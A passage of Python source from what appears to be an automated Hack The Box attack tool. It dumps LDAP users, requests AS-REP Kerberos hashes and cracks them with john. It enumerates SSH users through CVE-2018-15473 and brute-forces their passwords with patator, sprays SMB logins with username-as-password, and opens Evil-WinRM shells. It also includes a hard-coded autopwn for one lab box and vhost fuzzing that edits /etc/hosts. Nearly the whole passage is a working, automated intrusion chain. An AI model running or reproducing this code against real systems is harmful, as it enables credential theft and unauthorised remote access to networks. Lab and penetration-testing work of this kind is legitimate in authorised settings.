            tmpdns2.append(x.lower())
        unsortedhostnames = []
        for x in tmpdns2:
            unsortedhostnames.append(x.lower())
        allsortedhostnames = sorted(set(tmpdns2))
        for x in allsortedhostnames:
            allsortedhostnameslist.append(x.lower())
    else:
        for sslport in ssl_ports:
            if not os.path.exists(
                    c.getPath(
                        "webSSL", "webSSLScanTarget", sslport=sslport)):
                pass
            else:
                sslscanFile = c.getPath("webSSL", "webSSLScanTarget", sslport=sslport)
                domainName = []
                altDomainNames = []
                with open(sslscanFile, "rt") as f:
                    for line in f:
                        if "Subject:" in line:
                            # NOTE(review): lstrip("Subject:") strips a CHARACTER
                            # SET, not the prefix string — it can also eat leading
                            # letters of the hostname (e.g. 'st', 'b'). Confirm
                            # against sslscan output format.
                            n = line.lstrip("Subject:").rstrip("\n")
                            na = n.lstrip()
                            if na not in ignore:
                                domainName.append(na)
                        if "Altnames:" in line:
                            alnam = line.lstrip("Altnames:").rstrip("\n")
                            alname = alnam.lstrip()
                            alname1 = alname.lstrip("DNS:")
                            alname2 = (alname1.replace("DNS:", "").replace(
                                ",", "").split())
                            for x in alname2:
                                if x not in ignore:
                                    altDomainNames.append(x)
                        # Remember heartbleed findings for later reporting.
                        if (line.rstrip("\n") == "TLS 1.2 vulnerable to heartbleed" or
                                (line.rstrip("\n") == "TLS 1.1 vulnerable to heartbleed") or
                                (line.rstrip("\n") == "TLS 1.0 vulnerable to heartbleed")):
                            self.heartbleed = True
                both = []
                for x in domainName:
                    both.append(x.lower())
                for x in altDomainNames:
                    both.append(x.lower())
                tmpdns2 = []
                # Drop candidates containing characters invalid in hostnames.
                ignore_chars_regex = re.compile(r"[@_!#$%^&*()<>?/\|}{~:]")
                for x in both:
                    if ignore_chars_regex.search(x) is None:
                        tmpdns2.append(x.lower())
                for x in tmpdns:
                    tmpdns2.append(x.lower())
                unsortedhostnames = []
                for x in tmpdns2:
                    unsortedhostnames.append(x.lower())
                allsortedhostnames = sorted(set(tmpdns2))
                allsortedhostnameslist = []
                for x in allsortedhostnames:
                    allsortedhostnameslist.append(x.lower())
    if len(dnsPort) == 0:
        if len(allsortedhostnameslist) != 0:
            for x in allsortedhostnameslist:
                self.hostnames.append(x.lower())
    else:
        ######## Check For Zone Transfer ###############
        if not os.path.exists(c.getPath("dns", "dnsDir")):
            os.makedirs(c.getPath("dns", "dnsDir"))
        # Reverse lookup of the target first.
        dig_cmd = f"""dig -x {self.target} @{self.target}"""
        dp = dig_parser.digParse(self.target, dig_cmd)
        dp.parseDig()
        dig_hosts = dp.hosts
        sub_hosts = dp.subdomains
        if len(dig_hosts) != 0:
            for x in dig_hosts:
                self.hostnames.append(x.lower())
        if len(sub_hosts) != 0:
            for x in sub_hosts:
                self.hostnames.append(x.lower())
        if len(self.hostnames) != 0:
            # Attempt a zone transfer against every hostname found so far.
            alldns = " ".join(map(str, self.hostnames))
            zonexferDns = []
            dig_command = f"""dig axfr @{self.target} {alldns}"""
            dp2 = dig_parser.digParse(self.target, dig_command)
            dp2.parseDigAxfr()
            subdomains = dp2.subdomains
            for x in subdomains:
                zonexferDns.append(x.lower())
            sortedAllDomains = sorted(set(zonexferDns))
            for x in sortedAllDomains:
                self.hostnames.append(x.lower())
def SshUsersBrute(self):
    """If OpenSSH is in the service banner and < 7.7 from nmapParser's
    results, then enumerate valid usernames from SSH using a small
    wordlist of around 600 common names.

    If a valid username is found that isn't in the list of default linux /
    windows usernames from autorecon.utils/helper_lists.py, proceed to
    brute force that username's password with patator using Seclists
    probable top 1575.txt wordlist with a few custom added passwords.
    """
    cmd_info = "[" + fg.green + "+" + fg.rs + "]"
    cmd_info_orange = "[" + fg.li_yellow + "+" + fg.rs + "]"
    c = config_parser.CommandParser(
        f"{os.path.expanduser('~')}/.config/autorecon/config.yaml", self.target)
    dlu = helper_lists.DefaultLinuxUsers(self.target)
    default_linux_users = dlu.default_linux_users
    cl = helper_lists.Cewl(self.target)
    # Build the cewl-based wordlist first if it doesn't exist yet.
    if not os.path.exists(c.getPath("wordlists", "CewlPlus")):
        cl.CewlWordlist()
    blue = fg.li_blue
    green = fg.li_green
    yellow = fg.li_yellow
    red = fg.red
    teal = fg.li_cyan
    reset = fg.rs
    np = nmapParser.NmapParserFunk(self.target)
    np.openPorts()
    ssh_product = np.ssh_product
    ssh_version = np.ssh_version
    # Extract "X.Y" from the banner, e.g. "7.6p1 ..." -> 7.6.
    string_ssh_version = " ".join(map(str, ssh_version))
    lowercase_ssh_version = str(string_ssh_version).lower()
    first_two_nums = lowercase_ssh_version[0:3]
    int_first_two_nums = float(first_two_nums)
    # NOTE(review): ssh_product[0] assumes nmap reported an SSH product;
    # an empty list would raise IndexError here — confirm callers guard this.
    if ssh_product[0] == "OpenSSH":
        # CVE-2018-15473 username enumeration affects OpenSSH < 7.7.
        if int_first_two_nums < float(7.7):
            if not os.path.exists(c.getPath("ssh", "sshDir")):
                os.makedirs(c.getPath("ssh", "sshDir"))
            cmd = c.getCmd("ssh", "ssh_user_enum", port=self.port)
            print(cmd_info, cmd)
            print("This may take a few minutes.")
            try:
                call(cmd, shell=True)
            except ConnectionRefusedError as cre_error:
                print(cre_error)
                exit()
            try:
                # The enum tool writes JSON with a "Valid" username list.
                with open(c.getPath("ssh", "ssh_usernames"), "r") as json_file:
                    data = json.load(json_file)
                    num_valid_users = len(data["Valid"])
                    # Too many hits means the oracle is unreliable.
                    if num_valid_users < 55:
                        for valid in data["Valid"]:
                            if valid not in default_linux_users:
                                print(
                                    f"""{cmd_info} {teal}Unique User Found!{reset} {green}{valid}{reset}"""
                                )
                                self.unique_users.append(valid)
                            else:
                                print(f"""{cmd_info} """ + valid)
                    else:
                        print(
                            f"""OpenSSH returned too many false positives: {num_valid_users}"""
                        )
            except FileNotFoundError as fnf_error:
                print(fnf_error)
                exit()
            # Only brute force when the user list is small enough to finish.
            if len(self.unique_users) > 0 and (len(self.unique_users) < 4):
                if os.path.exists(c.getPath("wordlists", "CewlPlus")):
                    if os.path.getsize(c.getPath("wordlists", "CewlPlus")) > 0:
                        # Prefer the site-specific cewl wordlist when non-empty.
                        for u in self.unique_users:
                            print(
                                f"""{teal}Beginning Password Brute Force for User: {reset} {green}{u}{reset}"""
                            )
                            patator_cmd = c.getCmd("ssh", "patator_ssh_cewl_auto", port=self.port, user=u)
                            print(f"""{cmd_info} {patator_cmd}""")
                            call(patator_cmd, shell=True)
                    else:
                        for u in self.unique_users:
                            print(
                                f"""{teal}Beginning Password Brute Force for User: {reset} {green}{u}{reset}"""
                            )
                            patator_cmd = c.getCmd("ssh", "patator_ssh_auto", port=self.port, user=u)
                            print(f"""{cmd_info} {patator_cmd}""")
                            call(patator_cmd, shell=True)
        else:
            # Version not vulnerable: just tell the user how to do it manually.
            print(
                f"""{blue}{ssh_product[0]} {ssh_version[0]}{reset} is {red}NOT{reset} vulnerable to User Enumeration"""
            )
            print(
                f"""If you still want to brute force SSH, Consider using a tool such as Hydra or Patator manually."""
            )
            print(f"""For example""")
            print(
                f"""{cmd_info_orange}{yellow} {c.getCmd("ssh","patator_ssh_auto", port=self.port, user="******")} {reset}"""
            )
def PwnWinRM(self):
    """Attempt an automated Windows foothold when LDAP is exposed.

    Pipeline (all via nested closures, run by checkWinRm() at the end):
    enumerate domain users over LDAP -> request Kerberos pre-auth (AS-REP)
    TGT hashes -> crack them with john -> if cracked, open an Evil-WinRM
    shell; otherwise spray username-as-password over SMB and scrape AD
    account descriptions for candidate passwords. Includes a hard-coded
    autopwn path for HTB Monteverde (10.10.10.172).

    NOTE(review): self.ldapper is presumably a project LDAP wrapper and
    SMBConnection/SessionError presumably come from impacket — confirm
    against the file's imports.
    """
    np = nmapParser.NmapParserFunk(self.target)
    np.openPorts()
    ldap_ports = np.ldap_ports
    # Only worth trying on domain controllers / LDAP-exposing hosts.
    if len(ldap_ports) == 0:
        pass
    else:
        c = config_parser.CommandParser(f"{os.path.expanduser('~')}/.config/autorecon/config.yaml", self.target)

        def parse_users():
            """ Returns a list of users """
            # Pull every account via LDAP and persist the sAMAccountNames
            # to a wordlist file for later brute-force reuse.
            if not os.path.exists(c.getPath("wordlists", "wordlistsDir")):
                os.makedirs(c.getPath("wordlists", "wordlistsDir"))
            users_list = []
            user_obj = self.ldapper.get_all_users()
            with open(c.getPath("wordlists", "ldapUsernames"), "w+") as userlist_file:
                if user_obj:
                    for user in user_obj:
                        users_list.append(user['sAMAccountName'])
                        userlist_file.write(user['sAMAccountName'] + "\n")
                    return users_list
                else:
                    return None

        def check_parse_hashes():
            # For each LDAP user, try to obtain an AS-REP (Kerberos
            # pre-auth disabled) TGT hash; collect whatever succeeds.
            print(f"[{fg.li_magenta}+{fg.rs}] Creating List of Valid Usernames")
            users = parse_users()
            print(f"[{fg.li_green}+{fg.rs}] Checking for Kerberos Pre-Authentication TGT Hashes")
            domain = self.ldapper.get_domain()
            hashes = []
            if domain and users:
                for u in users:
                    try:
                        hashes.append(self.ldapper.get_tgt(u))
                    except Exception as e:
                        # Most users will fail (pre-auth enabled); just log.
                        print(e)
            if hashes:
                print(f"Found tgt hashes {hashes}")
            if not os.path.exists(c.getPath("loot", "lootDir")):
                os.makedirs(c.getPath("loot", "lootDir"))
            # Write hashes (if any) in john-crackable form, one per line.
            with open(c.getPath("loot", "krbHashes"), "w") as hash_file:
                if hashes:
                    for i in hashes:
                        hash_file.write(i.rstrip() + "\n")
            return hashes

        def HeresJonny():
            # Crack any harvested TGT hashes with john; True iff we had
            # hashes to feed it (not necessarily that a password cracked).
            krb_hashes = check_parse_hashes()
            if krb_hashes:
                print(f"[{fg.li_magenta}+{fg.rs}] Found krb hash!")
                print(f"[{fg.li_magenta}+{fg.rs}] BruteForcing The Hash!")
                john_cmd = c.getCmd("john", "jcrack", hashfile=f"{c.getPath('loot', 'krbHashes')}")
                call(john_cmd, shell=True)
                return True
            else:
                return False

        def parseCreds():
            # Parse `john --show` output; returns zip(usernames, passwords)
            # when at least one hash cracked, otherwise None (implicit).
            def cmdline(command):
                process = Popen(args=command, stdout=PIPE, shell=True)
                return process.communicate()[0]

            john_show_cmd = c.getCmd("john", "jshow", hashfile=f"{c.getPath('loot', 'krbHashes')}")
            john_show_output = [i.strip() for i in cmdline(john_show_cmd).decode("utf-8").split("\n")]
            # The "N password hash cracked," summary line starts with the count.
            num_cracked = [int(p[0]) for p in sorted(set(i for i in john_show_output if "password hash cracked," in i))]
            if (len(num_cracked) > 0):
                if num_cracked[0] >= 1:
                    passwords = []
                    usernames = []
                    for i in john_show_output:
                        if ":" in i:
                            # Lines look like $krb5asrep$...@DOMAIN:password;
                            # split out user (between $ and @) and password.
                            passwords.append(i.split(":")[1])
                            usernames.append(i.split(":")[0].split("$")[3].split("@")[0])
                            # print(i.split(":")[1])
                    return zip(usernames, passwords)

        def check_auth(creds=None):
            # Spray SMB logins: tries `creds` for every user, or
            # username-as-password when creds is None. Returns the list of
            # usernames that authenticated.
            valid_creds = []
            print(f"[{fg.li_magenta}+{fg.rs}] Brute-Forcing found usernames over SMB")
            users = parse_users()
            if users:
                for user in users:
                    try:
                        smb = SMBConnection(self.target, self.target)
                        test_login = smb.login(user, creds if creds is not None else user)
                    except SessionError:
                        test_login = False
                    print(f"Testing valid login: {user}:{creds if creds is not None else user} True or False? {fg.red}{test_login}{fg.rs}")
                    if test_login is True:
                        valid_creds.append(user)
                        print(f"\n[{fg.li_green}+{fg.rs}] Valid Credentials Found! {fg.li_green}{user}{fg.rs}:{fg.li_green}{creds if creds is not None else user}{fg.rs}\n")
            return valid_creds

        def query_disp_info():
            # Dump SAMR display info and keep AdminComment (description)
            # fields that look like they contain a password hint.
            domain = self.ldapper.get_domain()
            sdi = rpcenum.SamrDisplayInfo(self.target, domain)
            dump_user_info = sdi.dump(self.target, self.target)
            checklist = ['pass', 'Pass']
            possible_credentials = []
            for i in dump_user_info:
                if any(s in i['AdminComment'] for s in checklist):
                    # print(i['AdminComment'])
                    possible_credentials.append(i['AdminComment'])
            return possible_credentials

        def check_possible_creds():
            # Try every word of the suspicious descriptions as a password
            # for every user; return the first working (user, word) pair.
            check_for_creds = query_disp_info()
            if check_for_creds:
                wordlist = ' '.join(check_for_creds).split()
                for word in wordlist:
                    valid_login = check_auth(creds=word)
                    if valid_login:
                        print("Found Creds {}:{}".format(valid_login, word))
                        return (valid_login[0], word)

        def winrm_connect(username, password):
            # 401 from /wsman means WinRM is up and wants auth — launch an
            # Evil-WinRM session in a new process group with the creds.
            r = requests.post(f"http://{self.target}:5985/wsman", data="")
            if r.status_code == 401:
                try:
                    dope = f"""{c.getCmd("winrm", "evilWinRM", username=username, password=password, SHELL="$SHELL")}"""
                    print(f"[{fg.li_magenta}+{fg.rs}] Found Valid Credentials!!!")
                    print(f"[{fg.li_magenta}+{fg.rs}] {fg.li_green}{username}:{password}{fg.rs}")
                    print(f"[{fg.li_magenta}+{fg.rs}] Evil-WinRM !!!")
                    print(f"[{fg.li_magenta}+{fg.rs}] " + dope)
                    print(f"[{fg.li_magenta}+{fg.rs}] Enjoy the Shell Playboy ;) ")
                    kwargs = {}
                    # Detach the shell so it survives this process.
                    kwargs.update(start_new_session=True)
                    revshell = Popen(args=dope, stdin=PIPE, stdout=PIPE, stderr=PIPE, shell=True, **kwargs)
                    assert not revshell.poll()
                except IOError as e:
                    print(e)
                    exit()

        def monteverde(password):
            # HTB Monteverde autopwn: with authenticated smbmap loot, pull
            # the azure.xml config and extract the plaintext password.
            if os.path.exists(c.getPath("loot", "authSmbmap")):
                download_azure_config = c.getCmd("smb", "azure", validPass=password)
                print(download_azure_config)
                call(download_azure_config, shell=True)
                try:
                    if os.path.exists(f"{os.getcwd()}/10.10.10.172-users_mhope_azure.xml"):
                        from shutil import move
                        move(f"{os.getcwd()}/10.10.10.172-users_mhope_azure.xml", c.getPath("loot", "azure"))
                except FileNotFoundError as fnf_err:
                    print(fnf_err)
                if os.path.exists(c.getPath("loot", "azure")):
                    try:
                        import xmltodict
                        with open(c.getPath("loot", "azure"), "rb") as azure_file:
                            doc = xmltodict.parse(azure_file.read())
                            # PSCredential export: the secret lives at
                            # Objs/Obj/Props/S/#text in the XML.
                            azure_pass = doc['Objs']['Obj']['Props']['S']['#text']
                            auth_user = check_auth(creds=azure_pass)
                            if azure_pass:
                                if auth_user:
                                    winrm_connect(auth_user[0], azure_pass)
                    except FileNotFoundError as fnf_err:
                        print("FileNotFound: {}".format(fnf_err))

        def checkWinRm():
            # Orchestrator: cracked kerberos hash -> WinRM shell; otherwise
            # fall back to SMB spraying + description scraping.
            if HeresJonny() is True:
                r = requests.post(f"http://{self.target}:5985/wsman", data="")
                if r.status_code == 401:
                    try:
                        user_pass = dict(parseCreds())
                    except TypeError as te:
                        # parseCreds() returned None: nothing cracked.
                        print(te)
                        return 1
                    users = []
                    passwords = []
                    for k, v in user_pass.items():
                        users.append(k)
                        passwords.append(v)
                    if len(users) != 0 and (len(passwords) != 0):
                        winrm_connect(users[0], passwords[0])
            else:
                print(f"[{fg.red}+{fg.rs}] No valid Credentials Found. {fg.red}Try Harder{fg.rs}")
                if not os.path.exists(c.getPath("loot", "lootDir")):
                    os.makedirs(c.getPath("loot", "lootDir"))
                # Username-as-password spray over SMB.
                valid_password = check_auth()
                if valid_password:
                    print(f"{fg.li_green}[!]{fg.rs} Found Valid Credentials!!!\n Username: {fg.li_green}{valid_password[0]}{fg.rs}\n Password: {fg.li_green}{valid_password[0]}{fg.rs}\n")
                    print(f"[{fg.li_magenta}+{fg.rs}] Running smbmap with credentials")
                    auth_smb_check = c.getCmd("smb", "authSmb", validPass=valid_password[0])
                    print(auth_smb_check)
                    call(auth_smb_check, shell=True)
                    if self.target == "10.10.10.172":
                        autopwn_banner = r"""
 _______          __          ______
|   _   |.--.--.|  |_.-----.|   __ \.--.--.--.-----.
|       ||  |  ||   _|  _  ||    __/|  |  |  |     |
|___|___||_____||____|_____||___|   |________|__|__|

                    MONTEVERDE
"""
                        print(f"{fg.li_magenta}{autopwn_banner}{fg.rs}")
                        monteverde(valid_password[0])
                else:
                    # No user==pass hits: mine AD descriptions for passwords.
                    creds_ = check_possible_creds()
                    if creds_:
                        winrm_connect(creds_[0], creds_[1])

        checkWinRm()
def getLinks(self):
    """Grab all links from web server homepage i.e. http://IP:PORT/ and
    look for .htb domain names. If a .htb domain is found, add the
    hostname to the /etc/hosts file and then proceed to fuzz the hostname
    for virtual hostname routing using wfuzz. If a valid sub-hostname is
    found, add the domain to the /etc/hosts file as well using
    python_hosts library merge_names parameter.(Thanks for adding this
    feature! @jonhadfield)"""
    from subprocess import CalledProcessError

    def cmdline(command):
        # Run a shell pipeline and return its raw stdout bytes.
        process = Popen(args=command, stdout=PIPE, shell=True)
        return process.communicate()[0]

    np = nmapParser.NmapParserFunk(self.target)
    np.openPorts()
    http_ports = np.http_ports
    cmd_info = "[" + fg.li_green + "+" + fg.rs + "]"
    cmd_info_orange = "[" + fg.li_yellow + "+" + fg.rs + "]"
    c = config_parser.CommandParser(
        f"{os.path.expanduser('~')}/.config/autorecon/config.yaml", self.target)
    # Matches hostname-shaped tokens with a 3-letter TLD (e.g. foo.htb).
    domain_re = r"(?:[a-zA-Z0-9](?:[a-zA-Z0-9\-]{,61}[a-zA-Z0-9])?\.)+[a-zA-Z]{3}"
    if len(http_ports) != 0:
        if not os.path.exists(c.getPath("web", "webDir")):
            os.makedirs(c.getPath("web", "webDir"))
        for hp in http_ports:
            try:
                url = f"""http://{self.target}:{hp}"""
                wfuzzReport = c.getPath("web", "wfuzzReport", port=hp)
                page = requests.get(url, verify=False, timeout=(5, 30))
                data = page.text
                soup = BeautifulSoup(data, "html.parser")
                htb = [".htb"]
                source_domain_name = []
                # Scrape .htb hostnames from visible text nodes ...
                for link in soup.find_all(text=lambda x: ".htb" in x):
                    matches = re.findall(domain_re, link)
                    for x in matches:
                        if any(s in x for s in htb):
                            source_domain_name.append(x)
                # ... and from image src attributes.
                for link in soup.find_all('img'):
                    src_matches = link.get('src')
                    matches = re.findall(domain_re, src_matches)
                    for x in matches:
                        if any(s in x for s in htb):
                            source_domain_name.append(x)
            except requests.exceptions.ConnectionError as ce_error:
                print("Connection Error: ", ce_error)
                continue
            except requests.exceptions.Timeout as t_error:
                print("Connection Timeout Error: ", t_error)
                continue
            except requests.exceptions.RequestException as req_err:
                print("Some Ambiguous Exception:", req_err)
                continue
            # BUGFIX: initialize per-port. The original left all_hostnames
            # unbound (NameError) when neither source found a name, and
            # carried a stale value across loop iterations.
            all_hostnames = []
            if source_domain_name and self.hostnames:
                all_hostnames = list(
                    set(source_domain_name).union(set(self.hostnames)))
            if source_domain_name and not self.hostnames:
                all_hostnames = source_domain_name
            if self.hostnames and not source_domain_name:
                all_hostnames = self.hostnames
            if all_hostnames:
                vhostnames = [i.lower() for i in sorted(set(all_hostnames))]
                # BUGFIX: write one hostname per line (the original wrote
                # them back-to-back with no separator) and use a context
                # manager so the handle is always closed.
                with open(c.getPath("web", "vhostnames"), "a+") as vhost_log:
                    for vh in vhostnames:
                        vhost_log.write(vh + "\n")
                print(
                    f"""{cmd_info_orange} {fg.li_magenta}Found{fg.rs} {fg.cyan}{vhostnames}{fg.rs} in {fg.li_red}The Source!{fg.rs} http://{self.target}:{hp}"""
                )
                print(
                    f"""{cmd_info} {fg.li_magenta}Adding{fg.rs} {fg.li_cyan} {vhostnames}{fg.rs} to /etc/hosts file"""
                )
                hosts = Hosts(path="/etc/hosts")
                new_entry = HostsEntry(entry_type="ipv4", address=self.target, names=vhostnames)
                hosts.add([new_entry], merge_names=True)
                hosts.write()
                # Base domains (exactly one dot, e.g. "box.htb") are the
                # candidates for subdomain vhost fuzzing.
                base_domain_name = []
                for d in vhostnames:
                    self.htb_source_domains.append(d)
                    if d.count('.') == 1:
                        base_domain_name.append(d)
                try:
                    import wfuzz
                    from tqdm import tqdm
                    tk5 = c.getPath("wordlists", "top5Ksubs")
                    print(
                        f"""{cmd_info} wfuzz -z file,{tk5} -u {base_domain_name[0]}:{hp} -H 'Host: FUZZ.{base_domain_name[0]}:{hp}'"""
                    )
                    print(
                        f"{fg.li_yellow}Wfuzz's STDOUT is Hidden to prevent filling up Terminal. Desired Response Codes are unpredictable during initial fuzz session. {fg.rs} STDOUT will be written to {fg.li_magenta}{wfuzzReport}{fg.rs}"
                    )
                    str_domain = f"""{base_domain_name[0]}:{hp}"""
                    fuzz_domain = f"""FUZZ.{base_domain_name[0]}:{hp}"""
                    # top5Ksubs wordlist length, used only for the progress bar.
                    wordlist_lines = 4997
                    with tqdm(total=wordlist_lines) as pbar:
                        for r in wfuzz.fuzz(
                                url=str_domain,
                                hc=[404, 400],
                                payloads=[("file", dict(fn=tk5))],
                                headers=[("Host", fuzz_domain)],
                                printer=(wfuzzReport, "raw"),
                        ):
                            pbar.update()
                            pbar.set_description_str(desc=f"{fg.li_yellow}wfuzz{fg.rs}")
                except Exception as e:
                    print(e)
                if os.path.exists(wfuzzReport):
                    # Count occurrences of each response "chars" size in the
                    # wfuzz report; rare sizes (< 5 hits) suggest real vhosts.
                    awk_print = "awk '{print $6}'"
                    check_occurances = f"""sed -n -e 's/^.*C=//p' {wfuzzReport} | grep -v "Warning:" | {awk_print} | sort | uniq -c"""
                    response_num = [
                        i.strip()
                        for i in cmdline(check_occurances).decode("utf-8").split("\n")
                    ]
                    res_filt = [i.split() for i in sorted(set(response_num))]
                    # Renamed from `c` to avoid shadowing the config parser.
                    filt2arr = [
                        row for row in res_filt if len(row) != 0 and int(row[0]) < 5
                    ]
                    status_code = []
                    if len(filt2arr) != 0 and (len(filt2arr) < 5):
                        for htprc in filt2arr:
                            status_code.append(htprc[1])
                    if len(status_code) != 0 and len(status_code) <= 5:
                        for _ in status_code:
                            awk_print = "awk '{print $9}'"
                            get_domain_cmd = f"""grep '{_} Ch' {wfuzzReport} | {awk_print}"""
                            # BUGFIX: grep exits non-zero when nothing matches,
                            # which made check_output raise an uncaught
                            # CalledProcessError and abort the method.
                            try:
                                get_domains = (check_output(
                                    get_domain_cmd, shell=True,
                                    stderr=STDOUT).rstrip().decode("utf-8").replace('"', ""))
                            except CalledProcessError:
                                continue
                            subdomains = []
                            # BUGFIX: decoded output is never None; test for a
                            # non-empty string so we don't register ".domain".
                            if get_domains:
                                subdomains.append(get_domains)
                                sub_d = "{}.{}".format(subdomains[0], base_domain_name[0])
                                print(
                                    f"""{cmd_info_orange}{fg.li_blue} Found Subdomain!{fg.rs} {fg.li_green}{sub_d}{fg.rs}"""
                                )
                                print(
                                    f"""{cmd_info}{fg.li_magenta} Adding{fg.rs} {fg.li_cyan}{sub_d}{fg.rs} to /etc/hosts file"""
                                )
                                hosts = Hosts(path="/etc/hosts")
                                new_entry = HostsEntry(
                                    entry_type="ipv4",
                                    address=self.target,
                                    names=[sub_d],
                                )
                                hosts.add([new_entry], merge_names=True)
                                hosts.write()
                                self.htb_source_domains.append(sub_d)
def getOpenPorts(self):
    """Convenience wrapper: parse the target's nmap results for open ports
    via lib/nmapParser's NmapParserFunk."""
    parser = nmapParser.NmapParserFunk(self.target)
    parser.openPorts()